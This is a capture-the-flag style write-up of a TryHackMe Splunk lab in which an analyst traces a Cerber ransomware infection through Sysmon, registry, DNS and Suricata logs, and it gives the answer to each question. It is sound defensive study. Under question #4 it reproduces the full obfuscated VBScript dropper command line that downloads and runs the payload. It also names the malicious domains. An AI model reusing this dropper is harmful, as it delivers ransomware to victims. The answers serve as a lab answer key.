TryHackMe-BP-Splunk/Ransomware

From aldeid
Jump to navigation Jump to search
You are here
Task 6 - Ransomware

[Task 6] Ransomware

One of your users at Wayne Enterprises has managed to get their machine infected, work your way through this second scenario to discover how it happened! Don’t hesitate to use the material provided to give you a nudge!

#1 - What was the most likely IP address of we8105desk on 24AUG2016?

Apply a time filter to match the date 08/24/2016 to the below request:

index=botsv1 we8105desk 
| stats count by sourcetype
| sort -count
sourcetype count
XmlWinEventLog:Microsoft-Windows-Sysmon/Operational 104360
wineventlog 10028
stream:smb 1528
stream:ldap 48
nessus:scan 24
WinRegistry 3

Now, let’s request the IP seen by the first source:

index=botsv1 we8105desk  sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
| stats count by src_ip
| sort-count
src_ip count
192.168.250.100 52270
192.168.250.255 69
127.0.0.1 66
0.0.0.0 42
224.0.0.252 6
192.168.250.70 1

Answer: 192.168.250.100

#2 - What is the name of the USB key inserted by Bob Smith?

Googling for the terms find name usb key registry leads to https://docs.microsoft.com/en-us/windows-hardware/drivers/usbcon/usb-device-specific-registry-settings where we see that the name of USB key is stored under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB, in a key named FriendlyName.

Let’s search for it:

index=botsv1 sourcetype=WinRegistry friendlyname 
| stats count by registry_value_data

Answer: MIRANDA_PRI

#3 - After the USB insertion, a file execution occurs that is the initial Cerber infection. This file execution creates two additional processes. What is the name of the file?

Chances are that the first execution will be processed from the USB key directly. Let’s identify the potential drive for USB:

index=botsv1 we8105desk sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational 
| makemv delim=":" CurrentDirectory | eval drive=mvindex(CurrentDirectory,0) 
| stats count by drive
drive count
C 298
D 7

The USB key is with drive D:\. Now, let’s search in the sysmon logs for commands mentioning this drive.

index=botsv1 host="we8105desk" sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" CommandLine="*D:\\*" 
| table _time, CommandLine 
| reverse

Results:

_time CommandLine
2016-08-24 16:43:12 “C:Files (x86)Office14.EXE” /n /f "D:_Tate_unveiled.dotm"
2016-08-24 16:56:47 “C:3232.exe” C:3232.dll,OpenAs_RunDLL D:Stuff\013\013366.pdf

Answer: Miranda_Tate_unveiled.dotm

#4 - During the initial Cerber infection a VB script is run. The entire script from this execution, pre-pended by the name of the launching .exe, can be found in a field in Splunk. What is the length in characters of this field?

index=botsv1 host="we8105desk" sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" (CommandLine="*D:\\*" OR ParentCommandLine="*D:\\*") 
| eval length=len(CommandLine) 
| table CommandLine, length
| sort by -length
| head 1

Results:

CommandLine length
cmd.exe /V /C set “GSI=%APPDATA%%RANDOM%.vbs” && (for %i in (“DIm RWRL” “FuNCtioN GNbiPp(Pt5SZ1)” “EYnt=45” “GNbiPp=AsC(Pt5SZ1)” “Xn1=52” “eNd fuNCtiON” “SUb OjrYyD9()” “J0Nepq=56” “Dim UJv,G4coQ” “LT=23” “dO WHiLE UJv<>3016-3015” “G4coQ=G4coQ+1” “WSCRiPt.sLEeP(11)” “LoOP” “UsZK0=85” “ENd suB” “fuNctIon J7(BLI4A3)” “K5AU=29” “J7=cHR(BLI4A3)” “XBNutM9=36” “eNd fuNCtiON” “SUb MA(QrG)” “WXCzRz=9” “Dim Jw” “Qt7=34” “Jw=TIMeR+QrG” “Do WhiLE tIMEr<Jw” “WSCRipT.sleEP(6)” “LOOp” “EXdkRkH=78” “enD sUB” “fUnCTion M1p67jL(BwqIM7,Qa)” “Yi=80” “dIM KH,ChnFY,RX,Pg,C6YT(8)” “Cm=7” “C6YT(1)=107” “Rzf=58” “C6YT(5)=115” “BSKoW=10” “C6YT(4)=56” “Cwd6=35” “C6YT(7)=110” “AQ=98” “C6YT(6)=100” “Y6Cm1I=82” “C6YT(2)=103” “JH3F2i=74” “C6YT(8)=119” “JRvsG2s=76” “C6YT(3)=53” “Yh=31” “C6YT(0)=115” “GuvD=47” “Tbvf1=67” “SeT KH=cReATeObject(A9y(”3C3A1D301F2D063708772930033C3C201C2D0A34203B053C0C2D“,”Yo“))” “V2JR=73” “Set ChnFY=KH.GETfilE(BwqIM7)” “RGeJ=68” “SeT Pg=ChnFY.opEnASTExTstReAM(6806-6805,7273-7273)” “CtxOk=82” “seT RX=KH.cREateteXtFiLe(Qa,6566-6565,2508-2508)” “XPL9af=76” “Do uNtil Pg.aTEnDOfStReam” “RX.wRitE J7(OyVNo(GNbiPp(Pg.rEAD(6633-6632)),C6YT(0)))” “LooP” “IQz=49” “RX.cloSe” “CBR1gC7=51” “Pg.cLOSE” “PmG=64” “eNd funCTIOn” “FUNcTION Ql9zEF()” “IBL2=16” “Ql9zEF=secoND(Time)” “MUTkPNJ=41” “End FUNcTiOn” “FUnCtion A9y(Am,T1GCbB)” “CWCH9r=82” “Dim V3sl0m,F4ra,AxFE” “RLLp8R=89” “For V3sl0m=1 To (lEn(Am)/2)” “F4ra=(J7((8270-8232)) & J7((5328/74))&(miD(Am,(V3sl0m+V3sl0m)-1,2)))” “AxFE=(GNbiPp(mID(T1GCbB,((V3sl0m MOd Len(T1GCbB))+1),1)))” “A9y=A9y+J7(OyVNo(F4ra,AxFE))” “NeXT” “DxZ40=89” “enD fUNction” “Sub AylniN()” “N6nzb=92” “DIm GWJCk,Q3y,GKasG0” “FDu=47” “GWJCk=93961822” “UZ=32” “FoR Q3y=1 To GWJCk” “GKasG0=GKasG0+1” “neXt” “B1jq2Hk=63” “If GKasG0=GWJCk tHen” “KXso=18” “MA((-176+446))” “IP4=48” “Yq(A9y(”0B3B1D44626E7E1020055D3C20230A3B0C503D31230C3700593135344D201B53772C39173D475E2826“,”QcOi4XA“))” “YTsWy=31” “elSe” “DO5gpmA=84” “A8=86” “EnD iF” “XyUP=64” “eND SuB” “sUB GKfD3aY(FaddNPJ)” “SDU0BLq=57” “DiM UPhqZ,KbcT” “DxejPK=88” “KbcT=”Drn4AW"" “GROlc7=82” “sET UPhqZ=CREAteOBJecT(A9y(”332A7B05156A211A46243629“,KbcT))” “Gs0g=3” “UPhqZ.OpEn” “TF1=68” “UPhqZ.tyPE=6867-6866” “RDjmY=24” “UPhqZ.wrITe FaddNPJ” “WiFgvS=78” “UPhqZ.SaVeTOfIle RWRL,8725-8723” “AF=4” “UPhqZ.closE” “JC7sf2=1” “Cke4e” “JM=88” “EnD suB” “fuNCtIoN Yq(PDqi1)” “I0=22” “DiM YTwwO,BAU7Cz,Uv,JiYwVG,IK” “GJDnbE=32” “On ErrOR reSume NeXT” “B7bT=1” “Uv=”Tk"" “ELw=73” “sEt YTwwO=CREaTeObjeCT(A9y(”3C07082602241F7A383C0E3807“,Uv))” “K4=62” “GAiF” “IS1cj=19” “Set Dzc0=YTwwO.eNVIrONMEnt(A9y(”013B183400023A“,”EQiWw“))” “D9S=38” “RWRL=Dzc0(A9y(”14630811720C14“,”XU3“))&J7((8002-7910))& Ql9zEF & Ql9zEF” “AtCQ=95” “JiYwVG=”FcQqQ"" “Tf=79” “sEt BAU7Cz=CrEATEoBjECT(A9y(”2E38122329103E1725683B1C3D19123701“,JiYwVG))” “QUY=56” “BAU7Cz.OpeN A9y(”0D0E1E“,”KJ“),PDqi1,7387-7387” “JX2=58” “BAU7Cz.SeTReQuEstHeAdeR A9y(”1F59242828“,”OM8J“),A9y(”0D354C3D356B567A0F6B6B“,”VoL8XF“)” “URkT=71” “BAU7Cz.SEnD()” “QdFeA6=65” “if BAU7Cz.StaTUstExt=A9y(”652840353A542512023C5B3D572F27“,”S5I2A“) then” “PwTLW23=36” “GAiF” “R4xYBS=63” “MA(4)” “PjL6m=46” “GKfD3aY BAU7Cz.ReSpONSEbody” “Fj98=72” “Else” “D7T=91” “IK=”NNXFD0"" “NK=74” “SeT BAU7Cz= CreATeobJECT(A9y(”033125365F3D213E326A68030210121060“,IK))” “QJ=35” “BAU7Cz.oPeN A9y(”2A2F0E“,”TmjZ8d“),A9y(”07351B31556E40785D6F5D735D6F5E715B6F5E795D6E02291B33412B1F26“,”Ao" ),5022-5022" “UMp8=85” “BAU7Cz.SeTReqUesTheadER A9y(”1439190A24“,”AFXwm“),A9y(”371038301A716C5F7B6644“,”LUi“)” “NluUc=93” “BAU7Cz.SENd()” “EOtR=44” “If BAU7Cz.STaTUSTexT=A9y(”03510A3B3A51146F105F163B365E0C“,”OS0x“) THen GKfD3aY BAU7Cz.REsPOnSeBODY” “Q6sMEZ=54” “I9Nl7=56” “end if” “Dq=54” “eND FuNCTioN” “fUNctIon OyVNo(U1,Brt0d)” “SNOW=59” “OyVNo=(U1 ANd noT Brt0d)oR(NOt U1 And Brt0d)” “QTi5K=54” “enD funcTION” “Sub Cke4e()” “WTOyAw=62” “dIM EuM,WIbud,NCiN,Fs8HJ” “A5AT=92” “NCiN=”"""" “SX6=93” “WIbud=RWRL & Ql9zEF & A9y(”4A330F3F“,”WdGbOGp“)” “V5B7Zh=92” “M1p67jL RWRL,WIbud” “L13=45” “iF Fs8HJ=”" tHen MA(4)" “CHaK=38” “EuM=”Iqxkf"" “U56m=67” “SEt VP=creATeoBJEcT(A9y(”262B081420010C453521141407“,EuM))” “U5Quw=85” “VP.Run A9y(”1023287B163629755C0D6C06270F1E01536C6E7551“,”UsNL“) & WIbud & NCiN,2912-2912,5755-5755” “A6mfcYL=76” “End sUB” “JoxZ3=43” “AylniN” “suB GAiF()” “G4vzM=95” “Dim DCRml9g, CjoNOY9” “For DCRml9g = 68 To 6000327” “CjoNOY9 = Rvwr + 23 + 35 + 27” “Next” “KK0H=46” “enD sUb”) do @echo %~i)>“!GSI!” && start "" “!GSI!” 4490

Answer: 4490

#5 - Bob Smith’s workstation (we8105desk) was connected to a file server during the ransomware outbreak. What is the IP address of the file server?

index=botsv1 host="we8105desk" sourcetype=WinRegistry fileshare 
| head 1
Time Event
8/24/16 5:15:18.000 PM 08/24/2016 11:15:18.043
… 2 lines omitted …
process_image=“c:.exe”
registry_type=“CreateKey”
key_path=“HKU-1-5-21-67332772-3493699611-3403467266-11092#
#192.168.250.20#fileshare”
data_type=“REG_NONE”

Answer: 192.168.250.20

#6 - What was the first suspicious domain visited by we8105desk on 24AUG2016?

After removing all legitimate domains:

index=botsv1 src_ip="192.168.250.100" sourcetype=stream:dns record_type=A NOT (query{}="*microsoft.com" OR query{}="wpad" OR query{}="*.waynecorpinc.local" OR query{}="isatap" OR query{}="*bing.com" OR query{}="*windows.com" OR query{}="*msftncsi.com")
| table _time, query{}
| sort by _time 

Results:

_time query{}
2016-08-24 16:48:12.267 solidaritedeproximite.org
solidaritedeproximite.org
2016-08-24 16:49:24.308 ipinfo.io
ipinfo.io
2016-08-24 17:15:12.668 cerberhhyed5frqa.xmfir0.win
cerberhhyed5frqa.xmfir0.win

Answer: solidaritedeproximite.org

#7 - The malware downloads a file that contains the Cerber ransomware cryptor code. What is the name of that file?

index=botsv1 src_ip="192.168.250.100" sourcetype=suricata http.hostname=solidaritedeproximite.org 
|  table _time, http.http_method, http.hostname, http.url

Results:

_time http.http_method http.hostname http.url
2016-08-24 16:48:13.492 GET solidaritedeproximite.org /mhtr.jpg

Answer: mhtr.jpg

#8 - What is the parent process ID of 121214.tmp?

index=botsv1 121214.tmp sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" CommandLine=*
| table _time, CommandLine, ProcessId, ParentCommandLine, ParentProcessId 
| reverse
_time CommandLine ProcessId ParentCommandLine ParentProcessId
2016-08-24 16:48:21 “C:32.exe” /C START "" “C:.smith.WAYNECORPINC\121214.tmp” 1476 “C:32.exe” “C:.smith.WAYNECORPINC\20429.vbs” 3968
2016-08-24 16:48:21 “C:.smith.WAYNECORPINC\121214.tmp” 2948 “C:32.exe” /C START "" “C:.smith.WAYNECORPINC\121214.tmp” 1476
2016-08-24 16:48:29 “C:.smith.WAYNECORPINC\121214.tmp” 3828 “C:.smith.WAYNECORPINC\121214.tmp” 2948
2016-08-24 16:48:41 “C:.smith.WAYNECORPINC{35ACA89F-933F-6A5D-2776-A3589FB99832}.exe” 3836 “C:.smith.WAYNECORPINC\121214.tmp” 3828
2016-08-24 16:48:41 /d /c taskkill /t /f /im “121214.tmp” > NUL & ping -n 1 127.0.0.1 > NUL & del “C:.smith.WAYNECORPINC\121214.tmp” > NUL 1280 “C:.smith.WAYNECORPINC\121214.tmp” 3828
2016-08-24 16:48:41 taskkill /t /f /im “121214.tmp” 1684 /d /c taskkill /t /f /im “121214.tmp” > NUL & ping -n 1 127.0.0.1 > NUL & del “C:.smith.WAYNECORPINC\121214.tmp” > NUL 1280
2016-08-24 16:48:42 ping -n 1 127.0.0.1 556 /d /c taskkill /t /f /im “121214.tmp” > NUL & ping -n 1 127.0.0.1 > NUL & del “C:.smith.WAYNECORPINC\121214.tmp” > NUL 1280

Answer: 3968

#9 - Amongst the Suricata signatures that detected the Cerber malware, which signature ID alerted the fewest number of times?

index=botsv1 cerber sourcetype=suricata 
| stats count by alert.signature, alert.signature_id 
| sort -count
alert.signature alert.signature_id count
ETPRO TROJAN Ransomware/Cerber Checkin Error ICMP Response 2816764 2
ETPRO TROJAN Ransomware/Cerber Onion Domain Lookup 2820156 2
ETPRO TROJAN Ransomware/Cerber Checkin 2 2816763 1

Answer: 2816763

#10 - The Cerber ransomware encrypts files located in Bob Smith’s Windows profile. How many .txt files does it encrypt?

First run the following request:

index=botsv1 host=we8105desk sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" *.txt 
| stats count by TargetFilename

We see that the ransomware crypts files in several locations. To focus on Bob Smith’s Windows profile, let’s filter *.txt files in Bob Smith’s home folder:

index=botsv1 host=we8105desk sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" TargetFilename="C:\\Users\\bob.smith.WAYNECORPINC\\*.txt" 
| stats dc(TargetFilename)

Answer: 406

#11 - How many distinct PDFs did the ransomware encrypt on the remote file server?

The majority of logs related to PDF is in the wineventlog sourcetype:

index=botsv1 *.pdf 
| stats count by sourcetype 
| sort -count

Results:

sourcetype count
wineventlog 527
stream:smb 283
XmlWinEventLog:Microsoft-Windows-Sysmon/Operational 50
WinRegistry 3
stream:http 1

There are 2 distinct destinations:

index=botsv1 *.pdf sourcetype=wineventlog 
|  stats count by dest 
|  sort -count
dest count
we9041srv.waynecorpinc.local 526
we8105desk.waynecorpinc.local 1

The most probable one is the first name. Now, let’s target the source address:

index=botsv1 *.pdf sourcetype=wineventlog   dest="we9041srv.waynecorpinc.local" 
|  stats count by Source_Address 
|  sort -count
Source_Address count
192.168.250.100 525
192.168.2.50 1

The first IP was the one found in the beginning of our investigation for the remote file server.

Now, we should be able to know how many PDF files have been encrypted on the remove file server:

index=botsv1 sourcetype=wineventlog dest="we9041srv.waynecorpinc.local" Source_Address="192.168.250.100" Relative_Target_Name="*.pdf"
| stats dc(Relative_Target_Name)

Answer: 257

#12 - What fully qualified domain name (FQDN) does the Cerber ransomware attempt to direct the user to at the end of its encryption phase?

We already identified the domains at question #6:

index=botsv1 src_ip="192.168.250.100" sourcetype=stream:dns record_type=A NOT (query{}="*microsoft.com" OR query{}="wpad" OR query{}="*.waynecorpinc.local" OR query{}="isatap" OR query{}="*bing.com" OR query{}="*windows.com" OR query{}="*msftncsi.com")
| table _time, query{}
| sort by _time 

Results:

_time query{}
2016-08-24 16:48:12.267 solidaritedeproximite.org
solidaritedeproximite.org
2016-08-24 16:49:24.308 ipinfo.io
ipinfo.io
2016-08-24 17:15:12.668 cerberhhyed5frqa.xmfir0.win
cerberhhyed5frqa.xmfir0.win

At the end of the encryption process, the user is redirected to cerberhhyed5frqa.xmfir0.win.

Summary

Here is what we have found during our investigation: * User (or someone) inserted an infected USB drive into Bob Smith’s workstation (not sure why!?!) * Word document spawned a Suspicious Process which spawned additional processes * File was downloaded after calls were made to a FQDN and IP address * Encryption of files begin on both local disk and shares * Redirection to an external site with notification of encryption occurred